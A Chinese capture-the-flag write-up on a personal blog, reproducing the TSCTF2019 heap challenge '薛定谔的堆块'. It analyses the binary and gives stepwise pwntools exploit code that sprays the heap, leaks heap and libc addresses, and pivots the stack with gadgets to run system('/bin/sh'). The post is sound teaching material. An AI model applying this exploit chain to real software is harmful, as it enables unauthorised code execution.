<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsfavicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsfavicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><link rel="mask-icon" href="/%5Bobject%20Object%5D?v=2.6.2" color="#54bcff"><meta name="description" content="heapspray有很多的应用场景，但大多都是windows下的漏洞应用，关于Glibc的比较少，至今只看见两题： pwnhub.cn 故事的开始 calc TSCTF2019 薛定谔的堆块 这里参考第二篇文章针对第二题做个复现，理解下堆喷的思想。 1.函数理解，这里分析起来比较麻烦，最好就调试，直接给出相关的功能： (1)Create函数： ①创建chunk，但每次Create会创建0x10个相">
<meta property="og:type" content="article">
<meta property="og:title" content="TSCTF2019 薛定谔的堆块-HeapSpray">
<meta property="og:url" content="http://pig-007.github.io/2021/08/18/TSCTF2019%20%E8%96%9B%E5%AE%9A%E8%B0%94%E7%9A%84%E5%A0%86%E5%9D%97-HeapSpray/index.html">
<meta property="og:site_name" content="PIG-007">
<meta property="og:description" content="heapspray有很多的应用场景，但大多都是windows下的漏洞应用，关于Glibc的比较少，至今只看见两题： pwnhub.cn 故事的开始 calc TSCTF2019 薛定谔的堆块 这里参考第二篇文章针对第二题做个复现，理解下堆喷的思想。 1.函数理解，这里分析起来比较麻烦，最好就调试，直接给出相关的功能： (1)Create函数： ①创建chunk，但每次Create会创建0x10个相">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_21-46-26.png">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_21-49-21.png">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_21-56-19.png">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_21-58-56.png">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_23-06-41.png">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_23-07-14.png">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_23-38-18.png">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgs1-1.png">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgs2-1.png">
<meta property="og:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgs3.png">
<meta property="article:published_time" content="2021-08-18T05:40:30.000Z">
<meta property="article:modified_time" content="2021-08-19T08:03:32.074Z">
<meta property="article:author" content="PIG-007">
<meta property="article:tag" content="Heap-spray">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_21-46-26.png"><title>TSCTF2019 薛定谔的堆块-HeapSpray | PIG-007</title><link ref="canonical" href="http://pig-007.github.io/2021/08/18/TSCTF2019%20%E8%96%9B%E5%AE%9A%E8%B0%94%E7%9A%84%E5%A0%86%E5%9D%97-HeapSpray/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":true},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Tags</span></a></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">Search</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">PIG-007</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">TSCTF2019 薛定谔的堆块-HeapSpray</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2021-08-18</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2021-08-19</span></span></div></header><div class="post-body"><p>heapspray有很多的应用场景，但大多都是windows下的漏洞应用，关于Glibc的比较少，至今只看见两题：</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://atum.li/2016/12/05/calc/" >pwnhub.cn 故事的开始 calc</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/206484" >TSCTF2019 薛定谔的堆块</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>这里参考第二篇文章针对第二题做个复现，理解下堆喷的思想。</p>
<p>1.函数理解，这里分析起来比较麻烦，最好就调试，直接给出相关的功能：</p>
<p>(1)Create函数：</p>
<p>①创建chunk，但每次Create会创建0x10个相同大小的chunk，且大小为输入size+4。比如输入size为0xc，那么创建的chunk就是0x10个0x18大小的Chunk。同时每0x10个小chunk在宏观意义上组成一个大chunk，这里用SmallChunk和BigChunk区分一下。</p>
<p>②chunk的索引在全局数组dword_4060，chunkList中随机排列，比如idx为0的chunk不一定是第一个创建的。</p>
<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_21-46-26.png" alt="img"></p>
<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_21-49-21.png" alt="img"></p>
<p>这点在后面堆喷会用到，无法简单地通过打印值来判断heap地址，只能判断出在哪个BigChunk中，还得判断出某个SmallChunk在BigChunk中的位置才能泄露出堆地址。</p>
<p>③创建chunk读取数据时read_str函数里有\x00截断，所以Display在没有UAF的情况下难以泄露出地址，这里也不存在堆溢出。</p>
<p>④选择chunk类型时会给chunk_addr+size处赋值，这里就是之前申请size+4的原因。</p>
<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_21-56-19.png" alt="img"></p>
<p>这个赋予的值是一个ELF上的data数据地址，没啥用，迷惑用的，同时如果选择的选项不为1-4的话，就会不赋值，这个在后面很有用。</p>
<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_21-58-56.png" alt="img"></p>
<p>(2)Display函数：</p>
<p>比较常规，输出给定index范围的SmallChunk的内容</p>
<p>(3)Delete函数：</p>
<p>删除最后一次Create的BigChunk的所有SmallChunk，free数据且置指针NULL，没啥漏洞。但是这里删除是依据chunkList的顺序索引删除，而chunkList又是被打乱的，所以删除之后的顺序其实不是我们最开始输入数据的顺序，这个在后面unsortedbin泄露数据的时候需要注意一下。</p>
<p>(4)Modify函数：</p>
<p>编辑指定index的Small Block的内容，这里没啥用</p>
<p>(5)CallFunction函数：</p>
<p>根据Create时的最后那4byte的数值来决定执不执行某个函数指针(这个函数指针就是最开始创建的时候赋值的ELF上的数据)。</p>
<p>①*(chunk_addr+size) != 0，则set <em>(</em>(chunk_addr+size)) -= 1</p>
<p>②*(chunk_addr+size) == 0，则jmp <em>(</em>(chunk_addr+size))+0x4</p>
<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_23-06-41.png" alt="img"></p>
<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_23-07-14.png" alt="img"></p>
<p>这里调用CallFunction函数之后就可以调用到0xf7e87401，这里的*0x57d1ab8c是我们在堆上设置好的内容。</p>
<p>2.漏洞发现：</p>
<p>这里就结合Create函数，利用先申请填充内容之后再释放，使得*(chunk_addr+size)可控，从而能够调用任意函数。但是在保护全开的情况下想要调用函数，必须需要泄露地址，而地址在没有漏洞的情况下又没办法泄露。</p>
<p>堆喷原理：<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/Fang3s/articles/3911561.html" >https://www.cnblogs.com/Fang3s/articles/3911561.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>(1)堆喷结合CallFunction函数的-1泄露地址：</p>
<p>假设某个堆地址：magic_addr。由于这里可以Display，所以如果*magic_addr= magic_addr-1，而利用堆喷使得一定范围内的堆内容都为magic_addr，打印内容之后，就可以依据打印的内容，能够从中筛选出magic_addr，获取其索引，再经过我们制造堆喷过程中运算就能得到开始堆喷的地址start_addr。</p>
<p>比如：magic_addr = 0x58585858，申请了0x100个0x20000大小的Chunk，那么得到索引为0x58，且magic_addr 也是一个0x20000的chunk，就可求得start_addr为0x58585858-0x58*0x20000。当然这是理论上的，实际还得一系列的判断运算。</p>
<p>同理，在当我们释放堆块进入unsortedbin之后，踩下main_arena地址再申请回来，由于\x00截断很难泄露出地址，这里也是采用这个方法，使得\x00-1成为0xff来把\x00截断给抹杀。</p>
<p>(2)有了地址之后就可调用libc上任意的函数了，这里的one_gadget都用不了，在没办法往栈上输入数据的情况下就需要栈劫持了，这里找两个gadget，原题给的是：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#注释头</span></span><br><span class="line"></span><br><span class="line">magic_gadget1 = <span class="number">0x00161871</span><span class="comment"># 0x00161871 : xchg eax, ecx ; cld ; call dword ptr[eax]</span></span><br><span class="line">magic_gadget2 = <span class="number">0x00072e1a</span><span class="comment"># 0x00072e1a : xchg eax, esp ; sal bh, 0xd8 ;</span></span><br></pre></td></tr></table></div></figure>

<p>我用我自己编译的Libc是：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#注释头</span></span><br><span class="line"></span><br><span class="line">magic_gadget1 = <span class="number">0x00164401</span><span class="comment"># 0x00161871 : xchg eax, ecx ; cli ; jmp dword ptr[eax]</span></span><br><span class="line">magic_gadget2 = <span class="number">0x00073c10</span>+<span class="number">0x3a</span><span class="comment"># 0x00072e1a : xchg eax, esp ; sal bh, 0xd8 ;</span></span><br></pre></td></tr></table></div></figure>

<p>一样的，没啥区别，得自己找去。ROPgadget。</p>
<p>在调用jmp <em>(</em>(chunk_addr+size))+0x4时，看到context为</p>
<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsSnipaste_2021-08-10_23-38-18.png" alt="img"></p>
<p>这里的ecx就保存这一个堆地址，那么我们就利用ecx和eax结合这两个gdaget来进行栈劫持，从而getshell。</p>
<p>3.exp编写：</p>
<p>(1)堆喷堆布局，填充数据在堆上，满足*magic_addr=magic_addr，且其他chunk的所有数据也为magic_addr</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#注释头</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#----------------------------------------</span></span><br><span class="line"><span class="comment">#fill 0x58 to all chunk</span></span><br><span class="line">data = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">    data.append([<span class="string">&#x27;X&#x27;</span> * (<span class="number">0x20000</span> - <span class="number">1</span>), <span class="number">1</span>])</span><br><span class="line">malloc(<span class="number">0x20000</span>, data)</span><br><span class="line">delete()</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">    malloc(<span class="number">0x20000</span>, data)</span><br><span class="line"></span><br><span class="line"><span class="comment">#idx 0x0-&gt;0x100-1</span></span><br><span class="line"><span class="comment">#----------------------------------------</span></span><br></pre></td></tr></table></div></figure>

<p>(2)填充需要触发的chunk数据，满足<em>chunk_addr + size = magic_addr，然后调用callfuc函数使得</em>magic_addr= magic_addr-1，打印数据之后即可判断。</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-----------------------------------------------</span></span><br><span class="line"><span class="comment">#fill 0x1000 all 0x58 (idx 0x100-&gt;0x110-1)</span></span><br><span class="line">data = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">    data.append([<span class="string">&#x27;X&#x27;</span> * (<span class="number">0x1000</span> - <span class="number">1</span>), <span class="number">1</span>])</span><br><span class="line">malloc(<span class="number">0x1000</span>, data)</span><br><span class="line">delete()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">data = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">    data.append([<span class="string">&#x27;X&#x27;</span> * (<span class="number">0xf0</span> - <span class="number">1</span>), <span class="number">0</span>])</span><br><span class="line">malloc(<span class="number">0xf0</span>, data)</span><br><span class="line"><span class="comment">#idx 0x100-&gt;0x110-1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#0x100-&gt;0x110-1 OK</span></span><br><span class="line">callfuc(<span class="number">0x100</span>)</span><br><span class="line">show(<span class="number">0</span>, <span class="number">0x100</span>)</span><br><span class="line"><span class="comment">#-----------------------------------------------</span></span><br></pre></td></tr></table></div></figure>

<p>(3)判断chunk基于的BigChunk索引：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#注释头</span></span><br><span class="line"></span><br><span class="line">index = <span class="number">0</span></span><br><span class="line">offest = <span class="number">0</span></span><br><span class="line">out = <span class="string">&#x27;&#x27;</span></span><br><span class="line">magic_addr = <span class="number">0x58585858</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x100</span>):</span><br><span class="line">    out = p.recvline()</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;W&#x27;</span> <span class="keyword">in</span> out:</span><br><span class="line">        index = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">out = out[<span class="number">12</span> : ]</span><br><span class="line">offest = out.index(<span class="string">&#x27;W&#x27;</span>)</span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&#x27;magic_addr is : %d&#x27;</span> % index)</span><br><span class="line">log.info(<span class="string">&#x27;offest is : %d&#x27;</span> % offest)</span><br><span class="line">log.info(<span class="string">&#x27;start addr is : &#x27;</span> + <span class="built_in">hex</span>(magic_addr- offest))</span><br><span class="line">block_start = (index / <span class="number">0x10</span>) * <span class="number">0x10</span></span><br></pre></td></tr></table></div></figure>

<p>(4)计算chunk在BigChunk中的位置：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#注释头</span></span><br><span class="line"></span><br><span class="line">delete()</span><br><span class="line">count = <span class="number">1</span></span><br><span class="line">p_index = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">    log.info(<span class="string">&quot;start find prev block count = %d&quot;</span> % count)</span><br><span class="line">    data = []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">        data.append([p32(magic_addr - <span class="number">0x20008</span> * count) * (<span class="number">0x1000</span> / <span class="number">4</span> - <span class="number">1</span>),</span><br><span class="line"><span class="number">1</span>])</span><br><span class="line">    malloc(<span class="number">0x1000</span>, data)</span><br><span class="line">    delete()</span><br><span class="line"></span><br><span class="line">    data = []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">        data.append([<span class="string">&#x27;X&#x27;</span> * (<span class="number">0xa0</span> - <span class="number">1</span>), <span class="number">0</span>])</span><br><span class="line">    malloc(<span class="number">0xa0</span>, data)</span><br><span class="line"></span><br><span class="line">    log.info(<span class="string">&quot;start call fuc count = %d&quot;</span> % count)</span><br><span class="line">    callfuc(<span class="number">0x100</span>)</span><br><span class="line">    show(block_start - <span class="number">0x10</span>, index + <span class="number">1</span>)</span><br><span class="line">    p_index = <span class="number">0</span></span><br><span class="line">    out = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(index + <span class="number">1</span> - block_start + <span class="number">0x10</span>):</span><br><span class="line">        out = p.recvline()</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;W&#x27;</span> <span class="keyword">in</span> out:</span><br><span class="line">            p_index = i + block_start - <span class="number">0x10</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    delete()</span><br><span class="line">    <span class="keyword">if</span> p_index &lt; block_start:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    count += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&#x27;block start is : %d&#x27;</span> % block_start)</span><br><span class="line">log.info(<span class="string">&#x27;p_index is : %d&#x27;</span> % p_index)</span><br><span class="line">heap_start_addr = magic_addr - <span class="number">0x20008</span> * (count - <span class="number">1</span> + <span class="number">0x10</span> * (block_start / <span class="number">0x10</span>)) - offest - <span class="number">8</span></span><br><span class="line">log.info(<span class="string">&#x27;heap start is : &#x27;</span> + <span class="built_in">hex</span>(heap_start_addr))</span><br></pre></td></tr></table></div></figure>

<p>同样的方法，依据地址顺序遍历BigChunk中的0x1-0x10的所有可能范围，对于修改*chunk_addr= magic_addr-1，然后打印判断得到各个索引对应的地址。由于创建的时候是random函数，所以也可以用爆破的方式解决，概率为1/16。</p>
<p>(5)获取libc地址，方法是释放之后使之进入unsortedbin踩下地址，利用callfuc函数和字节错位的方法对抗\x00截断从而泄露出地址：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#注释头</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">    delete()</span><br><span class="line"></span><br><span class="line">data = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">    data.append([p32(heap_start_addr + <span class="number">8</span> + <span class="number">3</span> ) * (<span class="number">0x1000</span> / <span class="number">4</span> - <span class="number">1</span>), <span class="number">1</span>])</span><br><span class="line">malloc(<span class="number">0x1000</span>, data)</span><br><span class="line">delete()</span><br><span class="line"></span><br><span class="line">data = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">    data.append([<span class="string">&#x27;aaa&#x27;</span>, <span class="number">0</span>])</span><br><span class="line">malloc(<span class="number">0xa0</span>, data)</span><br><span class="line">callfuc(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>, <span class="number">0x10</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(index + <span class="number">1</span> - block_start + <span class="number">0x10</span>):</span><br><span class="line">    out = p.recvline()</span><br><span class="line">    out = out[<span class="number">12</span> : -<span class="number">1</span>]</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;aaa&#x27;</span> != out:</span><br><span class="line">        libc_addr = u32(out[<span class="number">4</span> : <span class="number">8</span>]) + <span class="number">1</span> - <span class="number">0x1b07b0</span></span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">log.info(<span class="string">&#x27;libc addr is : &#x27;</span> + <span class="built_in">hex</span>(libc_addr))</span><br><span class="line">delete()</span><br></pre></td></tr></table></div></figure>

<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgs1-1.png" alt="img"></p>
<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgs2-1.png" alt="img"></p>
<p><img src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgs3.png" alt="img"></p>
<p>这里的main_arena变化是因为0xedb7ab000变为了0xedb7afff，导致字节错位变化的，具体调试一下就知道</p>
<p>(6)劫持栈，结合gadget来getshell。</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#注释头</span></span><br><span class="line"></span><br><span class="line">magic_gadget1 = <span class="number">0x00164401</span>       </span><br><span class="line"><span class="comment">#xchg eax, ecx ; cli ; jmp dword ptr[eax] </span></span><br><span class="line">magic_gadget2 = <span class="number">0x00073c10</span>+<span class="number">0x3a</span>  </span><br><span class="line"><span class="comment">#xchg eax, esp ; sal bh, 0xd8 ;</span></span><br><span class="line">system_offest = <span class="number">0x3adb0</span></span><br><span class="line">binsh_addr = <span class="number">0x15bb0b</span></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">data = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">    data.append([p32(heap_start_addr + <span class="number">12</span>) * (<span class="number">0x1000</span> / <span class="number">4</span> - <span class="number">1</span>), <span class="number">1</span>])</span><br><span class="line">malloc(<span class="number">0x1000</span>, data)</span><br><span class="line">delete()</span><br><span class="line"></span><br><span class="line">data = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>):</span><br><span class="line">    data.append([(p32(libc_addr + magic_gadget2) + p32(<span class="number">0</span>) + p32(libc_addr</span><br><span class="line">+ magic_gadget1) + p32(<span class="number">0</span>) * <span class="number">4</span> + p32(libc_addr + system_offest) + p32(<span class="number">0</span>) +</span><br><span class="line">p32(libc_addr + binsh_addr)).ljust(<span class="number">0xa0</span> -<span class="number">1</span>, <span class="string">&#x27;\x00&#x27;</span>), <span class="number">0</span>])</span><br><span class="line">malloc(<span class="number">0xa0</span>, data)</span><br><span class="line">callfuc(<span class="number">0</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></div></figure>

<p>这里关于最后堆上数据的布局需要调试才能知道，建议先随便写几个，然后调试的时候在写数据。</p>
<p>▲题外话：这里其实并没有用到常规意义上的通过堆喷滑板0x0c，0x58之类的滑板指令来执行shellcode或者ROP，所以其实这里的magic_addr换成0x57575757，0x56565656也是一样可以的，只不过成功率可能会小不少，毕竟这里还最开始申请了一个随机大小的堆块，而且PIE堆的随机化程度也大多在0x56到0x58之间。</p>
<p>4.总结：</p>
<p>(1)堆喷思想：其实就是多级指针的思想，通过劫持指针来滑动程序流或者泄露地址。</p>
<p>(2)调试：汇编指令一定要熟悉，像劫持栈常用的xchg eax,esp等。</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://PIG-007.github.io">PIG-007</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://pig-007.github.io/2021/08/18/TSCTF2019%20%E8%96%9B%E5%AE%9A%E8%B0%94%E7%9A%84%E5%A0%86%E5%9D%97-HeapSpray/">http://pig-007.github.io/2021/08/18/TSCTF2019%20%E8%96%9B%E5%AE%9A%E8%B0%94%E7%9A%84%E5%A0%86%E5%9D%97-HeapSpray/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas 